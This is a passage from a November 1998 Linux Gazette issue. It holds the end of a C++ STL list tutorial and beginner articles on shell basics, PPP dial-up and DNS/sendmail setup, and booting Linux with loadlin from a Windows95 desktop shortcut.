#
cout << "Command line parameters after stable partition" << endl;
for_each(CmdLineParameters.begin(), CmdLineParameters.end(), PrintIt);
#
// Splice any flags from the original CmdLineParameters list into Flags list. 
Flags.splice(Flags.begin(), CmdLineParameters,
       CmdLineParameters.begin(), StartOfFiles);
#
if (!Flags.empty()) {
  cout << "Flags specified were:" << endl;
  for_each(Flags.begin(), Flags.end(), PrintIt);
}
else {
  cout << "No flags were specified" << endl;
} 
#
// parameters list now contains only filenames. Splice them into FileNames list.
FileNames.splice(FileNames.begin(), CmdLineParameters, 
       CmdLineParameters.begin(), CmdLineParameters.end());
#
if (!FileNames.empty()) {
  cout << "Files specified (in order) were:" << endl;
  for_each(FileNames.begin(), FileNames.end(), PrintIt);
}
else {
  cout << "No files were specified" << endl;
} 
#
// check if the help flag was specified
if (find_if(Flags.begin(), Flags.end(), IsHelpFlag())!=Flags.end()) {
  cout << "The help flag was specified" << endl;
}
#
// open the files and do whatever you do
#
}
Given this command line:
 
test17 -w linux -o is -w great
the output is
 
The wrong number (3) of file names were specified
Command line parameters after stable partition
-w
-o
-w
linux
is
great
Flags specified were:
-w
-o
-w
Files specified (in order) were:
linux
is
great


Conclusion

We have only touched on the things you can do with a list. We haven't even got to the point of storing a user defined class of object, although thats not hard.

If you understand the concepts behind the algorithms presented here you should have no trouble using the rest. The important thing with STL is to get the basics right.

The key to STL is really the iterator. STL algorithms take iterators as parameters. They take iterator ranges, sometimes one range, sometimes two. STL containers provide the iterators. Thats why we say list<int>::iterator, or list<char>::iterator, or list<string>::iterator.

Iterators have a well defined heirarchy. They have varying "powers". Some iterators provide read only access to a container, some write only. Some can only iterate forwards, some are bidirectional. Some iterators provide random access to a container.

STL algorithms require a certain "power" of iterator. If the container doesnt provide an iterator of that power, the algorithm will not compile. For example, the list container only provides bidirectional iterators. The generic sort() algorithm requires random access iterators. Thats why we need the special list member function sort().

To really use STL properly you will need to carefully study the various kinds of iterators. You need to see just what kinds of iterators are provided by what containers. You then need to see what type of iterators the algorithms require. You need, of course to understand what kinds of iterators you can have.


Using STL in the field

During the past year I have written a number of commercial C++ programs using STL. It reduced my effort and almost eliminated logic errors in all cases.

The largest program is about 5000 lines. Probably the most striking thing about it is its speed. It reads and extensively processes a 1-2 Mb transaction file in about twenty seconds. It was developed with GCC 2.7.2 on Linux and now runs on a HP-UX machine. It uses over 50 function objects and many containers ranging in size from small lists to a map with over 14,000 elements.

The function objects in the program are in a hierarchy where top level function objects call lower level ones. I used the STL algorithms for_each(), find(), find_if(), count() and count_if() extensively. I reduced nearly all of the internals of the program to STL algorithm calls.

STL tended to automatically organise my code into distinct control and support sections. By carefully crafting function objects and giving them meaningful names I managed to move them out of sight and concentrate on the flow of control in my software.

There is much more to know about STL programming and I hope you have enjoyed working through these examples.

The two books in the bibliography both have active errata pages on the web so you can keep them right up to date.

Stroustrup has an advice section at the back of each chapter which is excellent, especially for beginners and the whole book is in a much more conversational style than the earlier editions. It is also much larger. There are of course quite a few other books on STL in the bookshops. Have a look and see what you can find.

Bibliography

The STL Tutorial and Reference Guide, David Musser and Atul Saini. Addison Wesley 1996.

The C++ Programming Language 3e, Bjarne Stroustrup. Addison Wesley 1997.


Copyright © 1998, Scott Field
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Linux Basics

By


I was reading through the Linux Gazette Mailbag column, and noticed a number of requests for basic info about Linux and the use thereof. In this doc, I'll cover the basics of logging in, using the shell, and even some rudamentry shell scripting and various useful utilities. I won't, however, cover the use of X Windows, as that can be a whole subject unto itself. Also, I will only be able to cover the Debian distribution as I don't have RedHat or S.u.S.E or other distributions around here.

Before I begin, I would like to make one point: Linux is much more powerful than any Microsoft product, and with that greater power comes the responsibility to learn how to use it properly. This is to be expected, and is much less than painful than many make it out to be.


Logging In


So, you've got Linux installed on your system and you're just about to begin using it. You're presented with a screen looking like this:

Debian GNU Linux 1.3 geeky1 tty1

geeky1 login:

You probably created a personal account for yourself, and we'll use that. In these examples, the account is paul, password password. Now, at the login prompt type in your username, in our example, paul. The screen will now look like this:

Debian GNU Linux 1.3 geeky1 tty3

geeky1 login: paul
Password:
Now, watch your fingers while you type in the password - it won't be echoed for security reasons, and watching your fingers will help you keep from making a mistake. The system will now display the contents of /etc/motd, and run the file .bash_profile in your home directory if you're using the bash shell(most distributions default to using bash).


Using The Shell

The shell is kind of like DOS's command.com, but MUCH more powerful. The first command we're going to use is the touch command. All it does is either create an empty file, or update the last modified date on an already existing file. The shell prompt will probably look like a dollar sign. First, we want to make a directory to hold our work. At the prompt, type:
mkdir foo
Now, we want to use the ls command, which is the equivalent of DOS's dir command. While I'm at it, if you want more info on using any command listed here, type:
man command
Where command is the command you want more information on. man is short for manual page. Type ls, and it will list foo. Now, type:
cd foo
Okay, you're now in the foo directory. Oh dear, a bit confusing isn't it? The current directory isn't displayed on the prompt. Let's fix it. The environment variable PS1 holds the specification for the prompt. Type:
export PS1="\`pwd\`:\`whoami\`:\$ "
And you'll notice you're prompt has changed! Let me explain... export is used in bash to make the variable so that it is carried to other shells you run - if you don't export the variable, and run a program, the program won't know about the variable. It's good practice to use export whenever you set an evironment variable. Next, you'll notice \`pwd\`. What's with this \` stuff, you ask? In bash, the backslash is used to 'escape' a character - keep the shell from processing it. Why the backquote? In a shell, it's used to tell the shell to replace the stuff inside the backquotes with what's printed on the screen by the program that's inside them. For example, type:
echo f`pwd`f
The system will print:
f/home/paulf
The shell evaluated the backquotes, and replaced the text inside them with the output of the pwd program. Now, if we hadn't escaped the backquotes - the shell would evaluate them when it shouldn't and the current directory portion of the prompt would always stay the same. Now, in bash, ~ refers to your home directory. Go ahead, type:
echo ~
You'll get something like:
/home/paul
So, we say that the directory foo you just created is in the path ~/foo Now, I want you to type:
touch bork
And then type ls again. Wala! You've just created an empty file! Now, do it again, except this time creating three files - foo.txt, bork.txt and bar.txt. In DOS, if you wanted to change the extension of all these to .html, you'd have to do it by hand, right? Linux, however, is much more powerful. Type:
for i in `ls`; do mv $i `basename $i .txt`.html; done
And do an ls again. They've all changed extension to .html! You've actually done some shell programming. You've written what's called a for loop(for obvious reasons). For every instance reported by ls, the environment variable $i is set to the entry, and the stuff after do is run. Right now would be a good time to use man to learn about the basename command. It strips off the specified extension(in this case, .txt) and returns the value of $i sans the extension. The backquotes make certain that the shell ends up seeing it as:
mv foo.txt foo.html
Amazing, eh?

This brings to an end our basic intro to the shell. Next, I hope to write an intro to emacs and writing shell scripts.

-- Paul Anderson, [email protected]


Copyright © 1998, Paul Anderson
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Linux Installation Primer, Part Three

By


 

Copyright ® 1998 by Ron Jenkins. This work is provided on an "as is" basis. The author provides no warranty whatsoever, either express or implied, regarding the work, including warranties with respect to its merchantability or fitness for any particular purpose.

 

The author welcomes corrections and suggestions. He can be reached by electronic mail at , or at his personal homepage: http://home.unicom.net/~rjenkins/

 

Part Three: Network and Dialup Networking configuration

Well, here we are ready to start part three of the series, setting up basic networking functions, and connecting your Linux machine to the outside world. As with each installment of this series, there will be some operations required by each distribution that may or may not be different in another. I will diverge from the generalized information when necessary, as always.

 

In this installment, I will cover the following topics:

 

  1. Networking fundamentals.
  2. Preparing for the networking configuration.
  3. Configuring the loopback adapter.
  4. Configuring basic networking.
  5. Connecting to your Internet Service Provider.
  6. Configuring the Domain Name Service to function on a dialup connection.
  7. Configuring Sendmail to function on a dialup connection.
  8. Testing and troubleshooting your basic and dialup configuration.
  9. Some quick and dirty "cheats" if all else fails.
  10. Stupid Network Tricks.
  11. Resources for further information.
  12. About the Author.

 

Networking fundamentals.

I won't bore you with all the nasty details of the history of the Internet, how it came to be, etc. However, some basic understanding of how networking in general, and Transmission Control Protocol/Internet Protocol (TCP/IP) is necessary to maximize your effective use of a network, and by extension, the Internet.

 

At its most fundamental level, all networks require at least three things to function:

 

  1. An interface to pass the data packets to and from the computer.
  2. A physical connection of some sort to pass the data from one place to another.
  3. And finally a mutually agreed upon format to convey that data, using a common method, or language, usually called a protocol.

 

Just as a person who speaks only French will have a great deal of difficulty communicating with a person who speaks only English, (no matter how loud or slowly each one of you talks,) so too will two dissimilar networks be unable to communicate without a common language or protocol.

 

Grossly oversimplified, in the context of the Internet, this language is TCP/IP. (Yes, I know, it really happens through a series of functions based loosely on the OSI model, but for the purposes of this document, let us agree that TCP/IP is the language of choice.)

 

TCP/IP is based on numerical addresses, called IP addresses. I'm sure you have all seen something like xxx.xxx.xxx.xxx, where x is equivalent to some numerical value. A practical example would be 204.252.102.2, one the Domain Name Servers or DNS (more on this later) at an ISP here in town.

 

"But wait a minute, I don't type stuff like that, I type the ubiquitous dub dub dub dot foobar dot com thingy, (www.foorbar.com) and it works just dandy. What's up with this number stuff?"

 

Ah, grasshopper, this is where DNS comes in to play.

 

Through an interconnected system of servers, the DNS system functions much like an upside down pyramid.

 

Starting with your local DNS, which knows only about the machines on your local network, and how to talk to a machine higher up the totem pole if it gets confused, all the way up to the widest part of the pyramid, which contains the information for all the various master or "root" domains such as .com, .net, .edu, or .org. A huge and constantly changing database of all machine connect to the Internet is organized, collated, and sorted 24 hours a day.

 

Again, grossly oversimplified, residing on the DNS servers, in the form of something called "Zone files", each machines local to the relevant local network has two entries - an IP address and a hostname. In this article your machine's hostname will be tester, and your domain will be foober.net (this will need to be replaced with information gathered from your Internet Service Provider, as explained later.) This is called address resolution, and explains how the dub dub dub deal works.

 

Whenever a request goes out, these dandy little machines translate the hostname you have requested into an IP address if it is on your local network, or pass it on up the line if it is not. Pretty neat huh?

 

For the purposes of this document, the three components of your networking setup will consist of the following:

 

  1. The network interface in your case will be a thing known as the loopback adapter.
  2. The physical connection will be your phone line.
  3. The protocol you will use will be TCP/IP in one of two configurations, depending on your Internet Service Provider (ISP.)

 

Preparing for the networking configuration.

  1. Some information for you if you do not already have an ISP.
  2. Some information for you if you already do have an ISP.
  3. General information required in either scenario.

 

Some information for you if you do not already have an ISP.

As long as we are at this, and with the proliferation of every Tom, Dick, and Harry starting "The Ultimate Internet Service Provider," I provide the following things to consider when choosing an ISP:

 

I will present these considerations in question form, with explanations where necessary. These things are VERY important to know if you want to maximize your effectiveness on the Internet.

 

Initially, you will probably be connected to a salesman when you contact a prospective ISP. Ask to talk to a tech, or have one conference in to the call. Otherwise, the salesman may promise you anything to get you connected. The tech will be able to answer the following questions effectively. If the salesman or the tech refuse to do any of the above, or hem and haw around about any of these questions, thank them for their time and move on. This is not an ISP you want. So hang on to your modem, here we go:

 

 

Some information for you if you already have an ISP.

You should be okay, at least at the basic functionality level, if you have already been connected successfully to your present ISP. However, if you have been connecting using only Windows machines, you may or may not have problems with connecting the Linux box. See the NOTE, and SPECIAL NOTE below regarding NT specific issues.

 

General Information required in either scenario.

Before you do anything, you will need to acquire the following information from your ISP:

 

NOTE: Each ISP has it's own idiosyncrasies and procedures for accessing their service. What I will be accomplishing in this document is simply to get you physically logged in and connected to the ISP. There may or may not be additional steps required by your particular service to attain full functionality.

 

SPECIAL NOTE: Many ISP's unwisely, in my opinion, relay on NT architecture for remote access. This adds additional steps to your configuration, many proprietary to Microsoft and otherwise unnecessary. If your ISP is one of these shops, try to get a tech on the line while you are doing the configuration. If they are unwilling or unable to support Unix and Linux machines, get one who will. The ease of the configuration will be worth it, as well as having "shell" access to your ISP's network with which you can do all sorts of neat things, covered in the "stupid network tricks" section later.

 

Even so, look at my "cheat" section for some ideas and workarounds if your ISP is unwilling or unable to support your Linux box.

Configuring the loopback adapter.

The loopback adapter is necessary for the networking connection to function. Oversimplified, each network connection, or "interface" in UNIX parlance must be "bound" to a physical, as well as a logical adapter. The loopback adapter performs this function in the absence of an actual interface to the network, such as a Network Interface Card, or NIC.

 

We will use the loopback adapter both for testing and to "bind" the network connection to your ISP to, thus making your modem the network interface.

 

Slackware 3.5:

This should be done for you during the installation. If not, from the command line, type netcfg <return>, and when prompted choose 127.0.0.1 for your network interface.

 

RedHat 5.1:

Again, this should have been taken care during the installation procedure. If not, start X and choose the options Control Panel/Network Configuration, then at the bottom of the dialog box, choose Add and follow the prompts.

 

Configuring basic networking.

Slackware 3.5:

Basic network configuration is accomplished through either directly editing the configuration files them selves, through the use of the netconfig utility, or some combination of both of these methods.

RedHat 5.1:

Most of your network configuration can be accomplished through the aforementioned Control Panel/Network Configuration method, or using the linuxconf utility available on newer RedHat systems. You will find this utility under Start/Programs/Administration/Linuxconf.

 

Basically, you just need to cd to /etc/hosts, and choose a hostname and domain for your machine. I think its default is darkstar or something in Slackware, and localhost in RedHat. The important point to remember here is not to choose a hostname that is already on the Internet, and use your ISP's domain name for yours. So, if your ISP is psi.net:

 

darkstar.psi.net

 

At a minimum, if you are not connected to a LAN, and will only be dialing up to your ISP, the only entry required in your etc hosts file is your loopback adapter.

 

Connecting to your Internet Service Provider.

Slackware 3.5:

If you have followed my instructions previously, and chose the proper ISP, get him on the line and have him walk you through the configuration process, as it will be unique to each ISP.

 

If not, read on for some general pointers.

The symlink to /dev/modem should have already been created during installation, if not create it.

To begin with, you will have to connect manually using minicom to see just what your ISP requires.

 

minicom <return>

 

After it get done griping about not running as root, enter the configuration menu by depressing the Alt+z keys, then choose the proper configuration options. When finished, exit and save your changes as the default when prompted.

 

You should now see an O.K. prompt in the terminal window. If not, go back and check your configuration.

 

Now let's dial your ISP:

 

ATDTyourispaccessnumber

 

For instance:

 

ATDT 3659968 <return>

 

If all goes well, you should be presented with a login prompt. Enter your ISP assigned username and press the return key. Next you should be prompted for your password. Enter your ISP assigned password.

 

At this point, if all has gone well, you should start to see a bunch of garbage scroll across your screen. This is a good thing. This is the ppp daemon on the other end trying to connect to your machine.

 

To talk to it, we will first have to close minicom WITHOUT resetting the modem. Next we will have to start our own ppp daemon. I happen to stink at typing, so I made a little script to initiate the pppd connection:

 

vi unicom.connect <return>

 

pppd /dev/modem (or as I prefer /dev/cua1 for COM2,) crtscts defaultroute

 

now let's exit and save the file:

 

press the escape Esc key to enter the command mode, the depress Shift + : then wq <return> to write and quit the file.

 

Now, let's make the file executable (like a .EXE file in DOS,) by issuing the following command:

 

chmod +x filename (unicom.connect in this example.)

 

Okay! Now we are ready to go. At some point while we were doing all this minicom should have crapped out. If not depress Alt + Z and this time DO reset the modem.

 

Here we go:

 

  1. Start minicom.
  2. Dial your ISP.
  3. Enter your login when prompted.
  4. Enter your password when prompted.
  5. As soon as the garbage starts, depress Alt+z, then q to quit without resetting the modem.
  6. As soon as the command prompt comes back, run your connect script. In this example unicom.connect.
  7. Type ifconfig and press return. You should now see TWO entries. One for the loopback adapter, and one called ppp0 or something.
  8. Jump up and down and do the happy dance. You are connected!

 

RedHat 5.1:

If you have followed my instructions previously, and chose the proper ISP, get him on the line and have him walk you through the configuration process, as it will be unique to each ISP.

 

If not, read on for some general pointers:

First, is you haven't done it already, make sure you know which interface you modem is connected to. You will need to know this information. If it has not already been done, use the modemtool from the Control Panel to create a symbolic link from the serial port your modem is connected to /dev/modem. Alternately, you can enter this port directly into the dialog box when prompted as described below.

 

Generally speaking, the symlink to /dev/modem seems to be the way to go, so I won't go into why I don't use it. However, in any case you should know which COM port it resides on just in case you run into trouble, so:

 

COM 1: /dev/cua0; or /dev/ttsy0

COM2: /dev/cua1; or /dev/ttsy1

Etc.

 

RedHat users, provided the do not require any off the wall configuration options, have it pretty easy here. Simply choose Control Panel/Network Configuration/Interfaces, then choose Add. Choose PPP when prompted for the Interface type. Next, enter your ISP access number, login name and password.

 

Should your modem require any special customization, choose Customize from the dialog box. When you are finished, choose save and quit, then activate the interface either by highlighting the ppp0 entry in the Network Configurator, or on newer systems, you may use the Usernet tool located in Start/Programs/Networking. If all goes well, your modem should squeal like a pig for a moment, login, and then you should be off and running!

 

Configuring the Domain Name Service to function on a dialup connection.

This is fairly simple. We simply need to tell the Linux box to let the ISP DNS resolve hostnames for us. First, if you are currently running named (the daemon,) or BIND (the collection of programs that make named work,) cd to /etc/hosts.conf and make sure there is a line similar to the following contained there:

order hosts, bind

 

Now, let's tell the resolver (a magic little fellow constantly zipping around the guts of the machine looking things up,) how to find the outside world and talk to it.

 

From a term window or command prompt, cd to /etc/resolv.conf, then add your ISP's nameservers here using the following syntax:

 

nameserver <space> IP Address of the nameserver

 

For instance:

nameserver 196.356.2.4

nameserver 196.356.2.5

 

NOTE: the DNS machines will be searched in the order they are entered into the file, so put your ISP's primary first, secondary second.

 

During the configuration process your respective setup program may or may not have added additional information to this file. If so, comment them out by placing a pound (#) sign in from the line that contains the information.

 

To prevent a flood of e-mail on this, yes, I am aware there are many directives you can use here, and many DNS things such as a caching-only server you can employ to enhance the performance of the resolver, and these things will be covered in a later installment, so be patient.

 

 

Configuring Sendmail to function on a dialup connection.

Sendmail, like DNS, is an art unto itself. However, here are some general suggestions:

 

Cd to /etc/

Edit sendmail.cf, and look for lines like the following:

# "Smart" relay host (may be null)

DSyour.isp.mailmachine

 

Next look for these:

#who do I send unqualified names to (null means deliver locally)

DRyour.isp.mailmachine

 

#who gets all local email traffic ($R has precedence for unqualified names)

DHyour.isp.mailmachine

 

Finally, you may or may not want to use the following directive - read the docs.

 

#who do I masquerade as (I forget the rest of it, just look for the masquerade keyword.)

DMyour.isp.domain.name

 

Testing and troubleshooting your basic and dialup configuration.

On the connectivity side, usually it's a pass/fail operation. Either you get connected or you don't. Check /var/log/messages for some possible clues as to what went wrong.

 

If you connect, but can't do anything, it could be a thousand things, but here are some general guidelines to diagnose the problem:

  1. Can you ping the out side world by IP address? If yes, proceed. If no, something is wrong with your connection or the way it was set up. ifconfig and netstat -r can be of help here.
  2. Can you ping the outside world by hostname? If yes proceed, if no, you have a name resolution problem. Check your resolv.conf and make sure that your ISP DNS machines are the only things in there. Check your hosts file. Put your local info here. Make sure your local host (loopback) has an entry.
  3. Do you get connected, but sometimes lose your connection while reading stuff, or otherwise appear to have no activity on your line? Your ISP is probably running an automatic termination program AKA a serial killer, to prevent a line being locked up if a user's modem does not exit cleanly. While some ISP's frown upon it, the way around this is to run a "ping-forever" or keepalive shell program to defeat the timeout script.

 

Some quick and dirty "cheats" if all else fails.

If you have trouble getting Sendmail to retrieve your incoming mail and news from the outside world, simply use Netscape to access your incoming mail on your ISP. Provided you enter the correct information into the dialog boxes, Netscape has it's own pop3 interface, and doesn't need anything else.

 

Stupid Network Tricks.

 

Coming next month: Connecting your Linux machine to a network and making it an Internet Gateway for your other machines!

 

Resources for further information.

The Linux Documentation Project:

http://sunsite.unc.edu/LDP/

General Networking:

Network Administrator's Guide, System Administrator's Guide, and the NET-3 HOW-TO

The Linux User's Guide

DNS HOW-TO

ISP Hookup HOW-TO

 

Additionally, OS specific information can be found at the following websites:

Slackware 3.5:

http://www.cdrom.com/

RedHat 5.1:

http://www.redhat.com/

 

Finally, check the comp.os.linux* newsgroups, or drop me an e-mail.

 


Previous ``Linux Installation Primer'' Columns

Linux Installation Primer #1, September 1997
Linux Installation Primer #2, October 1997


Copyright © 1998, Ron Jenkins
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Loadlin.exe Installer

By


This makes a loadlin.exe button on a Windows95 desktop

How many times have you sat and waited for Windows to shut down while you rebooted? How many times have you read that "Please wait..." message? If I show you how to reboot in under one minute will you give it a try? Rhetorical questions all, yet there is a need for a fast reboot out of Windows if only to preserve your even temper and a sense of decorum. This little piece will install loadlin as your linux boot program and get you out of the Windows environment in under one minute. The by-product will be a login prompt for linux. I hope I do not get any complaints about this blatant effort to undermine the monopoly OS.

RedHat 5.1 can do this thing

Just about all linux distributions can do this little loadlin button on the desktop of DOS 7.0. The odd cat in the bunch is RedHat; an example is that they insist on loading up the /usr directory when /usr/local will do nicely. They have some quirks, but don't we all? This article fires up RedHat 5.1 and makes them fit in.

The RedHat installer will offer you a chance to add 'DOS and Windows connectivity'. Do it. This will let you mount the old DOS partition from linux and also allow you to copy your kernel image (vmlinuz) to a directory on the DOS partition to be booted by loadlin.exe.

The official RedHat position on LILO is a good one. They always offer to put LILO on the master boot record or the first sector of the first partition. This gives you a solid base to make your bootings work. They also let you skip the LILO installation.

Skip LILO

To use loadlin.exe, we will first skip LILO. The prompt in the RedHat installer asks you where to install LILO and I put the asterisk on the 'first partition' choice and Tab to the 'skip' choice and hit Enter.

When you startx, the control panel's linuxconf program (System Configuration) gives you a chance to set the 'Config-boot mode-LILO defaults' for your machine. Make sure that the 'LILO is used to boot this system' button is left 'up'.

All hail thenerd and his incessant questions!

(I got this idea from 'thenerd' in Portage la Prairie, Manitoba. The parents who own the machine did not want anything to change in the way that they played with their DOS. They did not want to have any changes in the bootup of their machine. So, if we boot from DOS to linux, they will never know about or see any 'LILO boot:' messages and they can remain fossilized.)

Make a bootdisk please

The RedHat installer asks you nicely if you will be making a boot disk and you will always answer 'yes'. Do not pass go. Go directly to 'yes'. You will thank me if you get those 'signal 11' errors (a whole other article). The beauty of this bootdisk is that you can experiment with boot time options for the kernel. Once you get linux rolling you can make a boot disk with the mkbootdisk command.

Fasten seatbelts during re-entry

After the install is complete, you will be rebooted. Pull out the boot disk because we are going back to DOS to set up the boot button. Since we do not have LILO on the master boot record, the system will boot DOS as usual. Yes I have made a big assumption about you installing linux AFTER the DOS is installed. It only makes sense when dealing with a predatory OS like DOS to let it think it has the whole system to itself. Once the master boot record is erased and overwritten by DOS you then can install a more sophisticated system like linux.

Special note on PartitionMagic 4.0

Direct from the technical support guru Will Erickson at powerquest.com: "PartitionMagic 4.0 does fully support Linux ext2 partitions. It is able to re-size them without any problems."

This is also the program to get for re-sizing your single FAT32 partition into something more reasonable, like maybe a linux web server and a personal linux workstation as well as a DOS game machine.

"The illegal operation occurred in this directory, Mr. Gates."

The directory for your linux kernel is your choice. Make one called 'c:\linux\kernels' and you can copy the 'linux.bat' verbatim. Now that we have a place for loadlin.exe to work, put it IN THE PATH. Do this by putting it in a DIRECTORY that is in the path. I already have a 'c:\utils' directory on the path and that is where you will find loadlin.exe.

The batch

The edit program works nicely for this batch file writing, but notepad will work for those of you without the command prompt. Here is the abbreviated linux.bat:

rem This ensures that any unwritten disk buffers are flushed

smartdrv /C

rem This loads up the kernel and boots linux

loadlin c:\linux\kernels\vmlinuz root=/dev/hda2 ro

Root equals what?

The '/dev/hda2' assumes that your linux boot partition is the second one on the first hard disk. Your special and unique installation gets entered as the 'root=your_root_partition_here'. The 'ro' will mount it 'read only' and that is just standard procedure. Do not make it 'rw' if you have not read about what pitfalls await.

Special linux power

My RedHat 5.1 partition is booting happily from /dev/hdc9 which is not any where near the 1024 cylinder limit; in fact it is 2 gigabytes over the limit. It is also on an extended partition. This is called a logical partition as opposed to a primary partition. The linux system of GNU components has got to be the most super-powered and adaptable OS on the market. It is booting without the BIOS from a logical partition in an extended partition that is 2 gigabytes over the 1024 cylinder limit. This is because loadlin.exe was developed by the linux web hacker method and the kernel folks and the LILO folks were included in the process. It is a powerful development model.

What is vmlinuz?

The vmlinuz is not there yet. It is the name you will give to your kernel image. We need to use the boot disk in a moment so that we can put a kernel in 'c:\linux\kernels'.

Save your 'linux.bat' in a directory ON THE PATH. I already have a 'c:\batches' directory that holds '.bat' files and this is where you will find 'linux.bat'.

The shortcut

At the DOS 7.0 desktop (Windows95 is just a window manager for DOS 7.0) you will now right click your rodent for the momentous creation of a new shortcut. Select your new 'linux.bat' with the 'browse' button beside the little command line window. Choose 'open' and it will be entered as the command line for your new shortcut.

Do a right click with your rodent on the new shortcut and select 'properties'. Then select 'program' and then the 'advanced' button. You need to make sure that your new batch will use the MS-DOS mode. You also need to use the current configuration, whatever that may be. The job is done.

Also give Microsoft a bit of credit for letting you choose a different icon.

The icon

If you right click your rodent on your new shortcut, the menu item 'properties' will get you to the 'change icon' button. Push de button and make it go.The choices are very nice and I have a personal attachment to the 'dynamite' icon. Perhaps you will choose the lightning bolt. Suffice it to say that what is about to happen to Windows is very swift and violent. My icon shows a detonator and some red sticks of dynamite and it is labelled 'LINUX'. It looks ominous and tempting, especially when Windows gets itself into a jam.

The last look at 'that message from Gates'.

You know, since I have installed the LINUX button, I use it to shut down Windows. The best part of this trick is that since I started using the LINUX button I have not seen 'that message'. You have seen it and you are just as ticked off by it as the rest of us. It says "It is now safe to turn off your computer." This one and that infernal "Your program has performed an illegal operation and will be shut down" message are probably the most offensive and arrogant messages from a supplier to its clients in the history of business relations. I thank the boys in Redmond, Washington for offending so many nice people. We are enjoying our linux boxes so much more when we reflect on the nice manners of our fellow travellers.

Time to test our work:

  1. make a new linux box without LILO
  2. make a boot disk for linux
  3. boot to DOS
  4. make a directory for the kernel
  5. write a batch file for loadlin.exe
  6. put the batch file on the path
  7. copy loadlin.exe to a directory on the path
  8. make a shortcut to the batch file on the desktop
  9. select or make a groovy icon for the shortcut
  10. select 'shutdown windows' for perhaps the last time
  11. boot the boot disk to linux
  12. read the rest of this drivel

The rest of this drivel

Now that the boot disk has you in linux, you "log in". You did remember your password and you are now called 'root' by your staff. Type the mc command and Enter. You will now be using mc (Midnight Commander) to finish the job.

The arrow keys will take you to '/boot'. Select 'vmlinuz-2.0.34-0.6' and then press Tab. Your cursor will jump to the other window.

Now we will actually do some 'linuxing'. Enter this:

mkdir /dos

Then Enter this:

mount -t vfat /dev/hda1 /dos

This '/dev/hda1' assumes that this is your DOS partition. Your special and unique setup will be entered as the "/dev/your_DOS_partition_here". It gets mounted on the /dos directory that you just created.

Then Enter this one:

cp /boot/vmlinuz-2.0.34-0.6 /dos/linux/kernels/vmlinuz

Oh yeah? Eat LeftAlt-F2!

Once these little commands are done, you will be able to navigate over to the '/dos' directory where your DOS partition is now visible and accessible from linux. Cool, eh?

If things are just too busy on the mc screens, you can hold Ctrl and press the letter 'o' to get back to the shell prompt. Ctrl-o again to get back to mc.

If you want to read documents and switch back and forth you can hold LeftAlt and press F2 to open another console; a virtual console. LeftAlt-F3 opens a third console. You get 64 of them with linux. Just log in again and fire up another version of mc or lynx or whatever. To get back, you select LeftAlt-F1. Four or five consoles should keep the average 'frantic reader' happy.

Copy the kernel to vmlinuz

The mc cursor is put on the kernel. It is in '/boot' and it is called 'vmlinuz-2.0.34-0.6' in RedHat 5.1. Tab to get your cursor into the other window. Here is why there are two of those windows:

"You get to see what you are doing."

Navigate to the '/dos' directory and then to the '/linux/kernels' directory.

Make sure the cursor is on the kernel. Tab over there now.

The kernel is highlighted in one window in '/boot' and the other window is in '/dos/linux/kernels'.

"F5 copy on two. Block somebody! Ready, break!"

Press F5. Voila! You get the copy window and all you have to do is hit Enter. The result? You now have a kernel image with the wrong name in the DOS partition.

Better yet, before you hit 'enter', type in the new name of your kernel:

/dos/linux/kernels/vmlinuz

The command line for these fiddlings is this:

cp /boot/vmlinuz-2.0.34-0.6 /dos/linux/kernels/vmlinuz

But I already did that

Caught me again. Yes, I got you to do something two different ways. Welcome to linux. Forgive me. I need you to open up your 'brain pathways', you see. The very best part of linux for me and a whole crew of other linuxians is that the computer is fun again. Isn't that why you got one in the first place?

The force is with you

Well, we have put a 'vmlinuz' kernel image in the DOS partition. Time to reboot.

Do NOT use the reset button. Your file system needs to be cleanly unmounted. Linux can 'fsck' and fix its way out of trouble but why tempt fate?

Type in this powerful command:

shutdown -r "now" (it also works without the quotes) This one does the reboot.

More power: shutdown -h "now" (this one does the halt of everything so you can turn off the machine)

Alternatively, RedHat and other distributions have implemented the 'Vulcan nerve pinch' so that folks switching from the 'crashing OS' can use Ctrl-Alt-Del to reboot.

Boot to DOS to boot to Linux

The Windows95 machine lets you select plain DOS mode at boot up. If you are just so impatient to see your test results, then boot to plain DOS mode.

Type in this fateful command:

linux

If you do want to see the fun stuff, let DOS do the bootgui thing all the way to the desktop.

"Thar she blows"

Sitting on your desktop is the ultimate affront to the 'powers that be' at Microsoft. Push that button and you destroy fifteen years of monopolistic avarice. Push that button and declare your right to freedom of expression. Push that button and stand up and be counted. Push that button and boot linux.

That about wraps it up from this desktop. Adios. Dynamite that sucker!

Reference reading and links:

BootPrompt-HOWTO - required reading for all linuxians

Bootdisk-HOWTO

Loadlin+Win95 mini-HOWTO

The RedHat Linux Installation Support FAQ - good basic stuff here

The Boycott Microsoft Page at www.vcnet.com/bms/

The home of RedHat at www.redhat.com

The home of PartitionMagic 4.0 at www.powerquest.com

Windows footnote

It is a good idea to close all other programs before pushing your LINUX button. The boot process takes about three seconds before you are uncompressing linux and an elapsed time of 58 seconds to the login prompt. Your mileage may vary. Your DOS file system is left a-ok and properly 'unmounted', if it is correct to talk about a rebooting 'crashing OS' that way.

Example: I have seven little programs running at startup and I added Netscape and an editor. Then I pushed the LINUX button. Elapsed time to the linux login prompt was 65 seconds.

Make sure you save your work before you hit that button!

Booting footnote

If the darn thing won't 'mount -t vfat' the /dos partition, it probably can not find the module dependencies file in '/lib/modules/preferred'. This is no sweat. Type this:

man symlink

Read the manual page for symlink. Then cd to '/lib/modules' and make a symlink called 'preferred' that points to your '/lib/modules/your_kernel_name_here'.

The command line for this is:

ln -s /lib/modules/your_kernel_directory_name_here(put a single space here)/lib/modules/preferred

This is very easy with mc. Start with the mc command. Navigate over to '/lib/modules'.

Put the cursor on the '/lib/modules/your_kernel_name_here' directory.

Type F-9, then f (for file), then s (for symlink), then arrow down to 'Symbolic link filename:'.

Enter this:

/lib/modules/preferred

Then Enter this:

depmod -a

The job is done.

It is ok to delete it and redo it if you wish. Also, you can 'Esc-Esc' the Symlink window to cancel.


made with GNU Emacs 20.2.1 on an i486
running RedHat 5.1 Linux 2.0.35-2
No animals were eaten during the testing of these procedures.
